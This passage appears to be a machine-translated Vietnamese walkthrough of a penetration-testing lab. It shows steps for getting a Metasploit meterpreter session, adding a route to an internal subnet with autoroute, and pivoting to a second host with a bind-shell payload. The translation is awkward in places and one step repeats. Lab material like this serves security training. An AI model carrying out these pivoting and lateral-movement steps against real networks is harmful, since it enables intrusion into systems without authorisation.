  8. Nhập exploit và nhấn Enter để khởi động khai thác. Điều này sẽ khởi động một phiên meterpreter như trong ảnh chụp màn hình.
  9. Nếu bạn có một ngày khai thác tốt, hộp sẽ bị lỗi; nhập ipconfig và nhấn Enter.
  10. Nhập run post/multi/manage/autoroute OPTIONS và nhấn Enter. Điều này sẽ thêm một tuyến đến mạng con 172.19.19.0/24 được kết nối với máy bị xâm nhập.

các bước tiếp theo :

  1. Một mạng khác xuất hiện có thể truy cập được từ máy này. Sử dụng máy này. Nhập run post/multi/manage/autoroute OPTION=s và nhấn Enter. Điều này sẽ thêm tuyến đến mạng con 172.19.19.0/24 được kết nối với máy bị xâm nhập.
  2. Chúng ta cũng có thể xác minh tuyến của mình, nhập run autoroute -p và nhấn Enter.
  3. Nhấn Ctrl+Z để chuyển phiên về nền. Nhập y và nhấn Enter để xác nhận.
  4. Xoay trục sang mục tiêu thứ hai trên mạng. Đặt mục tiêu và nó sẽ được định tuyến thông qua phiên hiện có của chúng ta. Bạn không thể thấy mạng 172.19.19, vì vậy bạn phải sử dụng thiết lập autoroute để truy cập nó.
  5. Có khả năng phiên của bạn sẽ bị lỗi, và vì vậy phương pháp dễ nhất là thay đổi tải trọng, bởi vì hai shell Meterpreter rất nặng. Nhập set PAYLOAD windows/shell/bind_tcp và nhấn Enter.
  6. Nhập exploit và nhấn Enter.
  7. Nếu khai thác gây ra sự cố của phiên Meterpreter, bạn có thể thử lại. Tuy nhiên, ba lần thử thất bại cho thấy một ngày khai thác tồi tệ. Bạn cũng có thể nhắm mục tiêu máy Linux distccd. Thách thức là giữ cho phiên Meterpreter hoạt động và tồn tại; điều này không hoạt động với phiên bản nguồn mở nữa.
  8. Bạn có thể sử dụng các bước tương tự để tham gia vào một điểm xoay trục khác — được gọi là xoay trục kép — nếu có một card mạng khác, như trong biểu đồ dưới đây.
  9. Đây là một chuyển động ngang nâng cao trên mạng doanh nghiệp, sẽ được xác định bởi thiết lập của quản trị viên. Bài thực hành kết thúc. Đóng tất cả các cửa sổ đã được mở.

Bình luận về bài viết này

Thịnh hành